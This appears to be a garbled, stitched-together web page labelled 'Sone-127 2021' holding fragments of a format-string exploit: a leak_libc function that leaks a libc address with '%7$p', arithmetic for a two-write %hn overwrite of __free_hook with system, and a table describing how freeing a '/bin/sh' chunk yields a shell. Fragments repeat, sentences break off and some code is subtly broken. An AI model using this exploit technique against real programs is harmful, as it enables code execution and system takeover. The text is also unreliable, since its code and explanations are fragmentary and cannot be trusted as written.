Sone-127 2021 💫

low = free_hook & 0xffff high = (free_hook >> 16) & 0xffff diff = (high - low) % 0x10000

def leak_libc(io): io.sendlineafter(b'> ', b'echo %7$p') io.recvuntil(b'echo ') leak = int(io.recvline().strip(), 16) log.success(f'Leaked address: hex(leak)') # __libc_start_main+231 is the usual location we see; adjust if needed libc_start_main_ret = leak - 231 libc_base = libc_start_main_ret - libc.sym['__libc_start_main'] log.info(f'Libc base: hex(libc_base)') return libc_base SONE-127 2021

> echo %7$p 0x7f5c1a2b2e30 The address 0x7f5c1a2b2e30 belongs to the (high address > 0x7f000000). low = free_hook & 0xffff high = (free_hook

| Function | Purpose | |----------|---------| | leak_libc | Uses the format‑string to leak a libc address and compute the base. | | write_free_hook | Crafts a two‑write %hn payload that stores system at __free_hook . | | get_shell | Uploads a chunk containing /bin/sh and then frees it, invoking system . | | main | Orchestrates the steps and drops | | get_shell | Uploads a chunk containing

The final crafted string (Python example):